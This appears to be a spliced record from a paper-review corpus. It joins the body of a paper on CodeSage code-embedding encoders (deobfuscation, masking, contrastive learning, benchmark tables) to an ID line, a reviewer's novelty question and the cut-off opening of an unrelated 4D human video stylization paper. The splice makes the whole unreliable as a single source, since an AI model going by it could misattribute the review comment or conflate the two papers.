bidirectional encoders via a mix of two objectives complementing each other: identifier deobfuscation (DOBF) and MLM without the 80-10-10 practice. Similar to a human programmer, finding meaningful names for obfuscated identifiers necessitates the model to acquire a profound comprehension of code semantics and structure. Meanwhile, as a more general objective, MLM covers other facets beyond identifiers of code – this is important for enriching the training signals, especially for data examples with non-informative identifier names. In the second stage, we leverage the (text, code) pairs for bimodal contrastive learning (CL). In contrast to existing approaches that primarily rely on naturally occurring text and code pairs, we propose a strategy to reduce the likelihood of the model learning shortcuts. Our approach involves exclusively utilizing the function body while disregarding the signature and return statements. We additionally harness CL based on hard negatives identified within the embedding space. We show that such a hard positive and negative construction strategy is simple, yet essential for effective bimodal contrastive learning. We train three bidirectional encoder representation models, namely, CODESAGE-SMALL (130M), CODESAGE-BASE (356M), and CODESAGE-LARGE (1.3B). We assess the effectiveness of our approach over a wide variety of discriminative tasks, where CODESAGE substantially outperforms the previous state-of-the-art models with similar model sizes on most tasks. To comprehend the factors contributing to successful code representation learning, we meticulously analyze the key components of our framework and present our findings for future research endeavors. 2 RELATED WORKS Embedding for Programming Languages Recently, there has been a surge of interest in learning general-purpose representations to support a wide variety of downstream tasks in programming languages. Feng et al. (2020a); Kanade et al. (2020); Li et al. (2023) take the inspiration of the success in text and optimize the Masking Language Modeling (MLM) objective on the linearized code data. Similar to text, they additionally optimize with replaced token detection objective (Clark et al., 2020) or the next sentence prediction objective (Devlin et al., 2019b) for source code. Another line of work leverages the structure aspect of code to provide additional training signals. Among them, Guo et al. (2021) leverages the data flow to encode the relation of “where-the-value-comes-from” between variables. Wang et al. (2021a); Jiang et al. (2021) inject syntactical structure from the abstract syntax tree (AST) through variant auxiliary objectives. A more recent work by Guo et al. (2022) flattens the AST structure into a sequence directly and encodes the syntax information via language modeling objectives. Wang et al. (2021b); Janne Lachaux et al. (2021) train a sequence-to-sequence language model to reconstruct the original code from an identifier-obfuscated code where class, function, and variable names are replaced with special tokens. Deobfuscation implicitly encodes data flow and AST without involving auxiliary objectives or complex input with deep hierarchy, since the model needs to understand the dependency between variables as well as code structure so as to correctly predict the names for identifiers. Contrastive Learning Ever since the early success attained by the Siamese network (Hadsell et al., 2006), contrastive learning has been widely adopted in representation learning using deep neural networks. Song et al. (2016) extends the vanilla triplet loss by contrasting each positive example against all in-batch negatives, which has greatly improved the learning efficiency and is further popularized by SimCLR (Chen et al., 2020). However, different from the compute version domain where effective positives can be obtained by stochastic transformations of images in the input space, effective data augmentation has long been a challenge in NLP due to the discrete nature of the input. Such challenge is further validated in Cao et al. (2021) which shows that dropout (Srivastava et al., 2014) as the minimum data augmentation is often more effective than those obtained by operating in the discrete input space, e.g., word deletion and replacement. Alternatively, various methods have been proposed to leverage naturally occurring pairs as positives. Zhou et al. (2022) treat the consecutive utterances from dialogue data as positives, while Neelakantan et al. (2022) consider the neighboring texts mined from the internet. A very recent work (Wang et al., 2022) leverages the question and answer or comment pairs from StackExchange and Reddit. In a similar vein for programming language, Guo et al. (2022); Wang et al. (2021a); Neelakantan et al. (2022) leverage (text, code) pairs with text mined from the docstrings. We take a step further by focusing on hard positive and hard negative construction, which is a key ingredient for representation learning and allows us to attain off-the-shelf embedding models. 3 Method 3.1 Mask Language Modeling and Deobfuscation Pre-training Given an input sequence with $N$ tokens, i.e., $\mathbf{x} = [x_1, x_2, \ldots, x_N]$, the mask language modeling objective (Devlin et al., 2019b) is formed as follows $$L_{MLM}(\mathbf{x}) = -\sum_{i \in M} \log P(x_i | \mathbf{x}^M)$$ (1) Here $M$ denotes the mask applied on the given input $\mathbf{x}$. Equation (1) is essentially a denoising objective with the task to predict the original tokens given the masked sequence $\mathbf{x}^M$. Deobfuscation We first consider identifier deobfuscation (DOBF) which pretrains the model to predict the masked-out names of the identifiers. Similar to human programmers, in order to deobfuscate the code, the model needs to understand both the semantics and structure of the code. Also the NL tokens, i.e., docstring and comment, are excluded from code obfuscation. When the model is trained to predict the identifier names, it can benefit from looking at and correlating with the NL tokens in comments or docstrings as those often carry rich semantics of code. Consequently, the model is encouraged to learn improved shared representations between PL and NL, as indicated by the better NL2Code search performance attained by DOBF than random masking in Table 3. DOBF is initially proposed for Seq2Seq models (Janne Lachaux et al., 2021; Wang et al., 2021b). To the best of our knowledge, we are the first to apply it to the encoder-only models. The main challenge to adopting DOBF for encoder-only models is to construct the one-on-one mapping between mask tokens (inputs to the LM) and identifier tokens (output labels) due to the differences in code tokenization (i.e., using tree-sitter) and model-specific tokenization (i.e., using a sentencepiece tokenizer). We briefly discuss the challenge in Appendix A.5. Random Masking Additionally, we also involve the random token masking strategy in BERT (Devlin et al., 2019b) for two main reasons. First, to promote better representations by promoting the model to learn beyond identifiers. Taking Python as an example, there are approximately 30% of the code tokens associated with identifiers, hence better representations can be attained by encoding the information carried by the remaining 70% of tokens. Second, not every programmer follows the naming conventions, e.g., meaningless variable names like `v1`, `v2`, `v3` can be used. Predicting such tokens is unnecessarily hard and provides a very limited training signal. We do not follow the 80-10-10 masking convention proposed in the standard MLM for text (Devlin et al., 2019b). Since source codes are composed of NL and PL tokens (i.e., identifiers, keywords, operators), random replacement of tokens could hurt both the structure and meaning of code and leads to deterioration in representation learning. We show in Section 4.2.1 that the 80-10-10 convention consistently results in worse performance on downstream tasks. In this paper, we also set the random masking rate to 15% which we find is optimal through our ablation study in Appendix A.4. For each training example, we randomly pick DOBF or random masking with equal probability. 3.2 BIMODAL CONTRASTIVE LEARNING WITH HARD NEGATIVE AND HARD POSITIVE Let \( x_i, x_{i+} \) denote a positive input pair and \( h_i, h_{i+} \) be the associated representations output by the last hidden layer of the encoder. Let \( B = \{h_1, h_{1+}, h_2, h_{2+}, \ldots, h_N, h_{N+}\} \) denote the representations of a randomly sampled batch with \( N \) pairs, we then minimize the following symmetric loss, \[ L_{CL}(h_i, h_{i+}) = - \left( \log \frac{\exp(h_i \odot h_{i+}/\tau)}{\exp(h_i \odot h_{i+}/\tau) + \sum_{k \in B \setminus (i,i+)} \gamma_k^i \cdot \exp(h_i \odot h_k/\tau)} \right) \\ + \log \frac{\exp(h_{i+} \odot h_i/\tau)}{\exp(h_{i+} \odot h_i/\tau) + \sum_{k \in B \setminus (i,i+)} \gamma_k^{i+} \cdot \exp(h_{i+} \odot h_k/\tau)} . \] Here, \( \tau \) is the temperature hyper-parameter which we set as 0.05 in this work. \( \odot \) denotes cosine similarity between two representation vectors. \( \gamma_k^i \) is the weight parameter which we will detail next. Hard Negative Without supervision, it is tricky to identify hard negatives. We resort to a distance-based unsupervised approximation of hard negatives proposed in Zhang et al. (2021). For a given anchor \( h_i \), hard negatives refer to those semantically different examples but are mapped close to \( h_i \) in the representation space. Thereby, the closer a negative is to the anchor \( h_i \) in the representation space, the larger \( \gamma \) value is desired, which can be characterized as follows \[ \gamma_k^i = \frac{\exp(h_i \odot h_k/\tau)}{\exp(h_i \odot h_k/\tau) + \sum_{j \in B \setminus (i,i+,k)} \exp(h_i \odot h_j/\tau)} . \] That is, \( \gamma_k^i \) approximates the relative importance of \( h_k \) to the anchor \( h_i \), among all \( 2N-2 \) in-batch negatives. Despite the semantic equivalence between training examples except the given positive pairs are not available in our case, the above approximation of hard negatives is still valid as each training batch is randomly sampled with a much smaller size compared to that of the whole training data. Hence the presence of false negatives within each batch is negligible when the training data is large and diverse enough. We set the batch size to 8K in this paper, under which we observe monotonic increasing performance reported on the downstream tasks. Hard Positive We consider naturally occurring (text, function) as positive pairs, where the text is mined from the function docstring (Husain et al., 2019). The extracted text often summarizes the high-level semantics of the code. Therefore, contrastive learning with such bimodal data largely boosts the NL2Code semantic search performance in Section 4.2.2. Further, the extracted text of semantically equivalent code, no matter from the same or different programming languages, is often less diverse compared to the code themselves. Thereby, semantically similar codes can be implicitly grouped together through the same or very similar summary text. Our conjecture is validated by the large performance gain on both in-language and cross-language Code2Code search in Section 4.2.2. --- For example, masking a couple of tokens randomly from `tokenizer.convert_ids_to_tokens` can yield `tokenizer.convert_ids_to<mask><mask>` but random token replacement can result in `tokenizer.convert_jet_toboattokens`. Consequently, the code semantics are largely altered and representation learning via the self-attention mechanism can thereby deteriorate. See Appendix A.3 for more. It is also easy to see that function names and input variable names often share a significant similarity, especially in terms of the lexical overlap with the summary text (see Appendix A.6 for statistics). We thereby form hard positives by removing both function signature and return statements.\footnote{Removal of function signature reduces the chance to learn shortcuts due to its similarity with the summary text. We remove the return statements to make a code look like a generic code snippet.} We assess the effectiveness of such hard positive construction strategy in Section 4.2.2. 4 EXPERIMENTS Training Data and Model Architecture We train our models on The Stack dataset \cite{kocetkov2022stack} over nine languages - Python, Java, Javascript, Typescript, C#, C, Ruby, Go, and PHP. As aforementioned, we train three embedding models with size 130M (CODESAGE-SMALL), 356M (CODESAGE-BASE), and 1.3B (CODESAGE-LARGE) parameters. Please refer to Appendix A for training details at each stage and model hyper-parameters. Evaluation Protocol We assess the performance of our models over two main categories of downstream tasks, semantic search and classification. Our goal is to perform an evaluation of the encoder models for those practical scenarios where supervised fine-tuning data collection is costly. We thereby focus on zero-shot semantic search and only finetuning a linear classification layer on top of the frozen encoders for classification tasks \cite{peters2019language, chen2020finetuning, wang2022code}. We report the fully finetuned classification results and finetuning hyper-parameters in Appendix B.3. Baselines We compare our models against four general-purpose code representation learning encoders and OpenAI-Embedding-Ada-002 (For convenience, we refer to it as OpenAI-Ada-002. For comparative analysis with OpenAI-CPT-Code-001 and OpenAI-Text-Embedding-3, please see Tables 8 & 9 in Appendix, where OpenAI-Ada-002 attains significantly better or on par performance against the previous and latest models, respectively). Both CodeBERT \cite{feng2020codebert} and GraphCodeBERT \cite{guo2021graphcodebert} are trained with standard MLM on six programming languages using CodeSearchNet \cite{husain2019codesearchnet} while the replaced token detection objective \cite{clark2020unified} and data flow prediction objectives are adopted as auxiliary objectives, respectively. UnixCoder \cite{guo2022unixcoder} is trained via three language modeling and two contrastive learning objectives using the same dataset. More recently, StarEncoder \cite{li2023starencoder} is trained with MLM and next sentence prediction \cite{devlin2019bert} on 86 programming languages from The Stack \cite{kocetkov2022stack}. We provide more details for each baseline model in Table 6 in Appendix. We also consider decoder-only baselines in Table 8 & 9 in Appendix B. 4.1 COMPARISON WITH THE BASELINES We first compare CODESAGE against the aforementioned baselines on the following tasks. **Code2Code** semantic search is the task of retrieving relevant code fragments given a code fragment as a query. In this work, we extend the Code2Code search evaluation set \cite{guo2022unixcoder} created from CodeNet to six more languages - C, C#, Javascript, Typescript, GO, and PHP, for which we summarize the details in Appendix B.2. We report the in-language where query and candidate codes are in the same language, code2code search results in Table 1. **NL2Code** semantic search is the task of using natural language as the query to retrieve the relevant code. We consider three benchmarks in Table 2: CoSQA \cite{huang2021cosqa}, AdvTest \cite{lu2021advtest}, and CSN \cite{guo2021graphcodebert}. Detailed data statistics can be found in Appendix B.2. **Classification** We consider three source code classification tasks. Code Defect detection is a benchmark in C from CodeXGLUE \cite{lu2021codexglue}, with a binary label indicating whether a code is insecure and may attack software systems. Code Complexity prediction \cite{jeon2023code} is a Java benchmark that requires predicting the algorithmic complexity among 7 labels. The RunTime error prediction \cite{bieber2023runtime} benchmark has 29 possible labels with highly imbalanced distribution (see Table 10 in Appendix). For a more robust evaluation, we balance the dataset by aligning its total training examples of the “no\_error” class with the cumulative count of the other 28 classes. **Overall Performance Summary** On Code2Code search, Table 1 shows that CODESAGE-SMALL (130M) persistently outperforms all the baseline models with known model size (i.e., exclude... | Model | Python | Java | JS | TS | C# | C | Ruby | PHP | GO | Avg | |---------------|--------|-------|-------|-------|------|-------|------|------|------|------| | CodeBERT | 14.40 | 7.62 | 5.47 | 6.05 | 3.66 | 5.53 | 13.55| 10.28| 6.27 | 8.09 | | GraphCodeBERT | 19.23 | 10.78 | 7.38 | 8.65 | 5.54 | 8.48 | 19.69| 15.67| 9.65 | 11.68| | StarEncoder | 19.17 | 11.65 | 9.0 | 10.52 | 5.69 | 9.72 | 21.57| 16.98| 10.81| 12.79| | UnixCoder | 30.77 | 16.45 | 21.32 | 21.95 | 6.19 | 15.62 | 32.33| 31.93| 13.94| 21.17| | OpenAI-Ada-002| 35.91 | 25.13 | 19.01 | 21.86 | 10.17| 29.15 | 40.85| 40.47| 23.43| 27.33| | CODESAGE-SMALL| 36.31 | 23.97 | 26.60 | 29.90 | 11.84| 22.84 | 29.06| 34.64| 19.56| 26.08| | CODESAGE-BASE | 47.52 | 22.84 | 28.70 | 31.95 | 13.37| 30.99 | 44.86| 51.13| 25.15| 32.95| | CODESAGE-LARGE| 46.70 | 33.13 | 37.16 | 41.18 | 16.81| 32.89 | 54.12| 52.13| 32.48| 38.51| Table 1: MAP score (%) of the zero-shot code search task. The language names mentioned in the top row indicate the languages queries and candidates are written in. | Model | CoQA | AdvTest | CSN | Defect | Complexity | Runtime | |---------------|--------|---------|-------|--------|------------|---------| | CodeBERT | 0.24 | 0.06 | 0.10 | 51.82<sub>0.38</sub> | 35.60<sub>1.96</sub> | 6.2<sub>0.02</sub> | | GraphCodeBERT | 16.20 | 5.58 | 11.26 | 55.26<sub>0.28</sub> | 55.54<sub>1.98</sub> | 10.63<sub>0.10</sub> | | StarEncoder | 10.78 | 0.93 | 2.69 | 53.2<sub>0.11</sub> | 50.63<sub>3.33</sub> | 8.91<sub>0.05</sub> | | UnixCoder | 42.11 | 27.32 | 46.39 | 60.28<sub>0.04</sub> | 76.45<sub>1.10</sub> | 20.87<sub>0.43</sub> | | OpenAI-Ada-002| 44.23 | 38.08 | 71.24 | 62.56<sub>0.11</sub> | 79.82<sub>0.50</sub> | 20.84<sub>0.36</sub> | | CODESAGE-SMALL| 49.92 | 41.28 | 63.86 | 57.52<sub>0.21</sub> | 79.76<sub>0.50</sub> | 25.05<sub>1.04</sub> | | CODESAGE-BASE | 48.50 | 49.08 | 68.72 | 57.74<sub>0.09</sub> | 85.32<sub>1.72</sub> | 24.70<sub>0.40</sub> | | CODESAGE-LARGE| 47.53 | 52.67 | 71.24 | 58.95<sub>0.13</sub> | 90.32<sub>1.10</sub> | 24.42<sub>0.28</sub> | Table 2: Left. MRR score (%) of NL2Code search in zero-shot setting. For CSN, we report the average performance over six languages (see Table 7 in Appendix for the detailed results). Right. F1 (macro) score of the source code classification tasks attained by only finetuning the classification head. We finetuned each model using three seeds and reported the mean and standard deviation (in subscript). The fully finetuned results can be found in Appendix B.3. OpenAI-Ada-002) on every language, with 23.19% relative (4.91% absolute) improvement on the average performance when comparing with UnixCoder. With the increased model size, CODESAGE-BASE and CODESAGE-LARGE outperform the best baseline model, i.e., OpenAI-Ada-002 (model size unknown), with 20.56% relative (5.62% absolute) and 40.91% relative (11.18% absolute) improvement on the average performance, respectively. As shown in Table 2, CODESAGE-SMALL achieves 18.54% to 51.1% relative (7.81% to 13.96% absolute) improvement over UnixCoder on NL2Code search. Compared to OpenAI-Ada-002, CODESAGE-SMALL attains a 12.86% relative (5.69% absolute) improvement on CosQA and an 8.4% relative (3.12% absolute) improvement on AdvTest. On the other hand, OpenAI-Ada-002 attains the same average performance as CODESAGE-LARGE on CSN. However, we want to highlight the performance gain attained by CODESAGE on AdvTest which contains normalized Python functions (from CSN) with function and variable names replaced by dummy variables (see Figure 9 in Appendix). AdvTest constructed in this way better assesses the generalization performance as the model needs to understand what the obfuscated code does so as to identify the correct target code for a given natural language query. Compared to both UnixCoder and OpenAI-Ada-002, CODESAGE persistently performs better on code complexity and runtime error prediction with large margins in Table 2. We also notice that CODESAGE underperforms both models on code defect detection, whilst attaining better performance when we finetuning the full models in Table 12 in Appendix. 4.2 Ablation Study 4.2.1 Masking Strategy 80-10-10 vs. Full Mask Given an input sequence, standard MLM (Devlin et al., 2019) first randomly samples a subset of its tokens, of which 80% are replaced by a special token "[MASK]", 10% are left unchanged, and the other 10% are replaced by random tokens from the vocabulary. We revisit def binary_search(arr, low, high, x): '''Returns index of x in arr if present, else -1.''' if high >= low: mid = (high + low) // 2 if arr[mid] == x: return mid elif arr[mid] > x: return binary_search(arr, low, mid - 1, x) else: return binary_search(arr, mid + 1, high, x) else: return -1 def chem_search(arr, low<MASK> high, x): '''Returns <MASK> of x in arr if present, else ~<MASK>''' if high >= low: mid = (high + low) // 2 if arr[mid] == x: return mid elif <MASK>[mid] > x: return 的所有~<MASK>(arr, low, mid - 1, <MASK>) else: return instead.search(arr, mid + 1, high) else: return -1 (a) Sample code (left) and its corrupted version following the 80-10-10 rule (right). (b) With a fixed masking rate of 15%, we assess the effectiveness of applying “Full Mask”, i.e., replacing the sampled tokens with the [MASK] token only, and the 80-10-10 corruption strategy on downstream tasks. Figure 2: 80-10-10 vs. “Full Mask”. | Model | CODESAGE-SMALL | CODESAGE-BASE | CODESAGE-LARGE | |----------------|----------------|---------------|----------------| | | R D S P | R D S P | R D S P | | NL2Code | 6.6 19.9 22.7 25.8 | 12.2 22.5 22.0 23.3 | 19.4 23.3 29.4 30.5 | | Code2Code (In) | 16.8 14.6 17.9 19.7 | 28.2 23.7 25.3 29.2 | 30.7 28.2 30.2 33.9 | | Code2Code (Cross) | 5.7 6.7 8.8 9.6 | 17.2 14.1 14.6 19.7 | 20.5 18.0 19.0 24.6 | | Classification | 51.2 53.9 53.5 53.4 | 53.8 55.6 54.8 55.4 | 52.0 55.6 57.2 56.5 | Table 3: We explore two options to leverage DOBF (D) and random masking (R) to complement each other. (1) Sequential (S): training the model with random masking first, then DOBF. (2) Parallel (P): randomly picking either DOBF or random masking for a training example – our strategy. the effectiveness of such convention, originally proposed for text, for code in Figure 2. Surprisingly, compared to simply replacing all selected tokens with the [MASK] token, i.e., “Full Mask”, the 80-10-10 masking scheme causes a large performance drop across different downstream tasks, as shown in Figure 2b. A similar finding has been reported in Gao et al. (2022) for text. However, the degradation is more severe for source code. As Figure 2a indicates, when replacing with random tokens, both the semantics and structure of the masked code can be largely disrupted, which together with the presence of “[MASK]” tokens makes the learning too challenging (see Appendix A.3 for more discussions). We hypothesize that excessive corruption may also account for the modest enhancement observed in downstream tasks when scaling up the size of a model trained with 80-10-10 in Figure 2b. It would be intriguing to explore whether this scaling trend would experience a sudden expansion with a further increase in model size and training data, potentially identifying a phase transition point, provided that the computational resources permit such an investigation. Deobfuscation & Random Masking Complement Each Other We investigate DOBF and the random masking based MLM with “Full Mask” in Figure 3. DOBF persistently outperforms random masking on classification, which validates our motivation that the model is promoted to better capture (understand) the code structure so as to predict the identifier names. DOBF also performs better on NL2Code search than random masking. A potential reason could be natural language in comments and docstrings often carry rich semantics of code while both being excluded from masking in DOBF; hence when training the model to predict the identifier names, it will look at and correlate with the natural language and lead to better contextualized representations between natural language and programming language. On the other hand, the random masking strategy (with “Full Mask”) outperforms DOBF on both in-language and cross-language Code2Code search tasks. As examined in Appendix A.3, a large portion of tokens in code snippets are not identifiers. Therefore, the random masking strategy allows the model to learn beyond identifiers and enrich the semantics encoded in representations. In summary, Table 3 validates our strategy of jointly optimizing DOBF and random masking so as to leverage their strengths to complement each other. (a) Effectiveness of hard negatives and hard positives. (b) Unimodal vs. bimodal contrastive learning. Figure 3: (a) Hard negative and hard positive can independently boost performance over the baseline where neither is applied. Further improvement is attained when leveraging them simultaneously. (b) Unimodal contrastive learning with positives obtained via dropout requires longer training and hence cannot leverage vast amounts of training data to further enhance the representations. 4.2.2 ON EFFECTIVENESS OF CONTRASTIVE LEARNING Hard Positive and Hard Negative Effectively Boost Performance We first demonstrate the effectiveness of the hard positive and hard negative construction strategy in Figure 3a. As it shows, both hard positive and hard negative can independently improve the performance by a large margin, while the combination of them persistently yields better performance across different model sizes. We also observe that a large model size (i.e., CODESAGE-BASE) benefits more from the proposed hard negative construction strategy. This observation is unsurprising since larger models possess more capacity to leverage more challenging and effective learning objectives. Unimodal vs. Bimodal Contrastive Learning In Figure 3b we compare our bimodal contrastive learning approach against the Dropout-based unimodal contrastive learning where a positive pair is obtained by leveraging different dropout masks of the transformer in two forwarding passes of the same sequence (Gao et al., 2021; Guo et al., 2022). For a fair comparison, hard negative optimization is applied to both approaches. We can see that the dropout-based unimodal contrastive learning suffers from supporting a long training process and hence cannot effectively utilize a large amount of pretraining data to further improve the representations. A similar finding has been reported by (Zhou et al., 2022). Indeed, both Gao et al. (2021) nor Guo et al. (2022) – demonstrate dropout as effective augmentation for text and code respectively, only use a few million training examples that can be covered by the amount of training data in the first 500 iterations (with batch size 8K) in Figure 3b, where the dropout-based contrastive learning shows improvement over the baseline. Larger Improvement on Cross-Lingual Search To gain a deeper understanding of the performance improvement achieved through contrastive learning during Stage II of pretraining, we delve into the analysis of semantic search performance. As Figure 4a shows, contrastive learning persistently boosts the search performance with comparatively larger improvement on the cross-lingual scenarios, encompassing both NL2Code and cross-language Code2Code search. We posit that the text extracted from docstring helps group semantically equivalent code together as the text often summarizes the high-level semantics of code and hence are likely less diverse than the code themselves. In particular, those parallel examples from different programming languages can share very similar or even the same summary. For NL2Code, the larger improvement can be credited to its alignment with the bimodal contrastive learning objective using (text, code) as positives. Such bimodal objective also brings NL and PL closer in Figure 4b. Compared to the model trained at Stage-I only, contrastive learning pulls together NL and PL such that the relative similarity gap between parallel NL2Code pairs and cross-language Code2Code parallel examples largely decreased. (a) The performance of CodeSAGE in semantic search, comparing results between searches within the same language and across different languages, while varying model sizes and training approaches. (b) Cosine similarity between parallel examples vs. randomly sampled pairs using CodeSAGE representations. Figure 4: Examining the effectiveness of contrastive learning (Stage-II) by comparing CodeSAGE against those trained with the token-level denoising objective only (Stage-I). (a) Compared to the in-language Code2Code search, contrastive learning persistently leads to a larger performance boost for cross-lingual search, including both NL2Code and cross-language Code2Code search. (b) Contrastive learning leads to more dispersed representation space with improved discrimination, as indicated by the corresponding enlarged similarity gap between parallel and randomly sampled pairs, while simultaneously bridging the relative similarity gap between NL2Code and Code2Code pairs. 4.3 On Objective and Downstream Performance Scaling with Model Size In Figure 5, we study how the downstream task performance scales with the model size when pretrained with different schemes, i.e., token-level objective only (Stage-I), contrastive learning only (Stage-II), and our proposed two-stage framework with Stage-I followed by Stage-II. We use zero-shot multilingual in-language code search performance (averaged over nine languages) for this exploration. We can see that models pretrained from scratch with contrastive learning alone do not scale with the increased model size. Neelakantan et al. (2022) report a similar finding that the contrastive objective on its own is not sufficient to learn useful representations. When training from scratch with contrastive learning only, we find the training loss often converges at a large value, indicating the model cannot well discriminate each positive pair from the other in-batch negatives. In other words, leveraging the token-level denoising objective to provide a good embedding foundation is essential for contrastive learning to be effective and further enhance the sequence-level presentations. 5 Conclusion In this study, we unveiled CodeSAGE, a cutting-edge encoder representation learning model for source code. We trained CodeSAGE using an extensive dataset comprising 237 million code files and 75 million bimodal code and natural language pairs across nine languages. Our findings reveal that our model outperforms its predecessors significantly in tasks related to code search and code classification. We also delve into the essential factors contributing to enhanced code representation learning across various model sizes. We hope our work will serve as an inspiration for future works not only in code representation learning by effectively utilizing publicly accessible extensive corpora for source code, but also in the broader field of universal model training. This includes integrating language generation and embedding within a single model, as seen in the works of Jain et al. (2023) Muenninghoff et al. (2024). Additionally, we aim to encourage advancements in cross-domain representation learning, such as unifying text and code embedding within a single model. REFERENCES Marie anne Lachaux, Baptiste Roziere, Marc Szafraniec, and Guillaume Lample. DOBF: A de-obfuscation pre-training objective for programming languages. In A. Beygelzimer, Y. Dauphin, P. Liang, and J. Wortman Vaughan (eds.), *Advances in Neural Information Processing Systems*, 2021. URL https://openreview.net/forum?id=3ez9BSHTNT. David Bieber, Rishab Goel, Dan Zheng, Hugo Larochelle, and Daniel Tarlow. Static prediction of runtime errors by learning to execute programs with external resource descriptions. In *The Eleventh International Conference on Learning Representations*, 2023. URL https://openreview.net/forum?id=lLp-CSnTdJG. Mark Chen, Jerry Tworek, Heewoo Jun, Qiming Yuan, Henrique Ponde de Oliveira Pinto, Jared Kaplan, Harri Edwards, Yuri Burda, Nicholas Joseph, Greg Brockman, et al. Evaluating large language models trained on code. *ArXiv preprint*, abs/2107.03374, 2021. URL https://arxiv.org/abs/2107.03374. Ting Chen, Simon Kornblith, Mohammad Norouzi, and Geoffrey E. Hinton. A simple framework for contrastive learning of visual representations. In *Proceedings of the 37th International Conference on Machine Learning, ICML 2020, 13-18 July 2020, Virtual Event*, volume 119 of *Proceedings of Machine Learning Research*, pp. 1597–1607, 2020. URL http://proceedings.mlr.press/v119/chen20j.html. Aakanksha Chowdhery, Sharan Narang, Jacob Devlin, Maarten Bosma, Gaurav Mishra, Adam Roberts, Paul Barham, Hyung Won Chung, Charles Sutton, Sebastian Gehrmann, et al. Palm: Scaling language modeling with pathways. *arXiv preprint arXiv:2204.02311*, 2022. URL https://arxiv.org/abs/2204.02311. Kevin Clark, Minh-Thang Luong, Quoc V. Le, and Christopher D. Manning. Electra: Pre-training text encoders as discriminators rather than generators. In *International Conference on Learning Representations*, 2020. URL https://openreview.net/forum?id=rIxmMH1BtvB. Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. BERT: Pre-training of deep bidirectional transformers for language understanding. In *Proceedings of the 2019 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Volume 1 (Long and Short Papers)*, pp. 4171–4186, Minneapolis, Minnesota, June 2019a. Association for Computational Linguistics. doi: 10.18653/v1/N19-1423. URL https://aclanthology.org/N19-1423. Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. BERT: Pre-training of deep bidirectional transformers for language understanding. In *Proceedings of the 2019 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Volume 1 (Long and Short Papers)*, pp. 4171–4186, 2019b. doi: 10.18653/v1/N19-1423. URL https://aclanthology.org/N19-1423. Zhangyin Feng, Daya Guo, Duyu Tang, Nan Duan, Xiaocheng Feng, Ming Gong, Linjun Shou, Bing Qin, Ting Liu, Daxin Jiang, and Ming Zhou. CodeBERT: A pre-trained model for programming and natural languages. In *Findings of the Association for Computational Linguistics: EMNLP 2020*, pp. 1536–1547, 2020a. doi: 10.18653/v1/2020.findings-emnlp.139. URL https://aclanthology.org/2020.findings-emnlp.139. Zhangyin Feng, Daya Guo, Duyu Tang, Nan Duan, Xiaocheng Feng, Ming Gong, Linjun Shou, Bing Qin, Ting Liu, Daxin Jiang, and Ming Zhou. CodeBERT: A pre-trained model for programming and natural languages. In *Findings of the Association for Computational Linguistics: EMNLP 2020*, pp. 1536–1547, Online, November 2020b. Association for Computational Linguistics. doi: 10.18653/v1/2020.findings-emnlp.139. URL https://aclanthology.org/2020.findings-emnlp.139. Jun Gao, Changlong Yu, Wei Wang, Huan Zhao, and Ruifeng Xu. Mask-then-fill: A flexible and effective data augmentation framework for event extraction. In *Findings of the Association for Computational Linguistics: EMNLP 2022*, pp. 4537–4544, Abu Dhabi, United Arab Emirates, December 2022. Association for Computational Linguistics. doi: 10.18653/v1/2022.findings-emnlp.332. URL https://aclanthology.org/2022.findings-emnlp.332.
LH2JNpfwdH
Also, in the METHODOLOGY section, the authors are repeatedly mentioning that many components of the framework are motived by previous methods. How could authors persuade reviewers the proposed the framework is innocative instead of an incremental work with the combination of previous works?
Towards 4D Human Video Stylization Anonymous authors Paper under double-blind review Abstract We present a first step towards 4D (3D and time) human video stylization, which addresses style transfer, novel view synthesis and human animation within a unified framework. While numerous video stylization methods have been developed, they are often restricted to rendering images in specific viewpoints of the input video, lacking the capability to generalize to novel views and novel poses in dynamic scenes. To overcome these limitations, we leverage Neural Radiance Fields (NeRFs) to represent videos, conducting stylization in the rendered feature space. Our innovative approach involves the simultaneous representation of both the human subject and the surrounding scene using two NeRFs. This dual representation facilitates the animation of human subjects across various poses and novel viewpoints. Specifically, we introduce a novel geometry-guided tri-plane representation, significantly enhancing feature representation robustness compared to direct tri-plane optimization. Following the video reconstruction, stylization is performed within the NeRFs’ rendered feature space. Extensive experiments demonstrate that the proposed method strikes a superior balance between stylized textures and temporal coherence, surpassing existing approaches. Furthermore, our framework uniquely extends its capabilities to accommodate novel poses and viewpoints, making it a versatile tool for creative human video stylization. The source code and trained models will be made available to the public. 1 Introduction Existing video style transfer methods have seen substantial progress in recent years (Li et al., 2019; Wang et al., 2020; Liu et al., 2021; Chen et al., 2021a; Chiang et al., 2022; Wu et al., 2022). These methods are designed to produce stylized frames given the content frames and a style image. To mitigate the issue of flickering artifacts between frames, they typically resort to optical flow or temporal constraints in an attempt to create smoother content. However, even as these methods excel at crafting high-quality stylized frames, built upon 2D networks, they are fundamentally bound to the same perspective as the source content videos. Consequently, video stylization in novel views remains unexplored. Furthermore, these techniques utterly lack the capability to alter or animate human poses within the stylized video, rendering them severely limited in their creative potential. On the other hand, while NeRFs (Mildenhall et al., 2020) have been utilized in prior works to render stylized novel views in a static scene (Huang et al., 2022; Chiang et al., 2022; Liu et al., 2023) given dense views as the input, directly applying them to dynamic human scenes presents three primary issues. First, it is challenging to model dynamic humans in a scene across different frames, especially since NeRF is inherently designed for static scenes. Consequently, the learned model is incapable of performing human animation. Second, it is challenging to efficiently encode and optimize 3D points due to the significant computational cost associated with the model structure, such as multiplayer perceptions (MLPs). Third, one model for arbitrary style images (zero-shot stylization) presents an additional layer of complexity. In this paper, we propose a holistic approach to perform video stylization on the original view, novel views, and animated humans by arbitrary styles through a united framework. Given a monocular video and an arbitrary style image, we first reconstruct both the human subject and environment simultaneously and then stylize the generated novel views and animated humans, facilitating creative effects and eliminating the dependency on costly multi-camera setups. More specifically, we incorporate a human body model, e.g., SMPL (Loper et al., 2015), to transform the human from the video space to the canonical space, optimize the static human in the canonical space using NeRFs. and make animation-driving of the human feasible. In addition, we improve the tri-plane-based representation (Fridovich-Keil et al., 2023) (representing the 3D space with three axis-aligned orthogonal planes which is fast in training and inference process)'s feature learning. We discretize both the human and scene spaces into 3D volumes and introduce the geometry prior by encoding the coordinates on the grids. This assists in learning a more robust feature representation across the entire 3D space. To render each pixel value, we project two camera rays into both NeRFs and extract the feature by projecting the points on 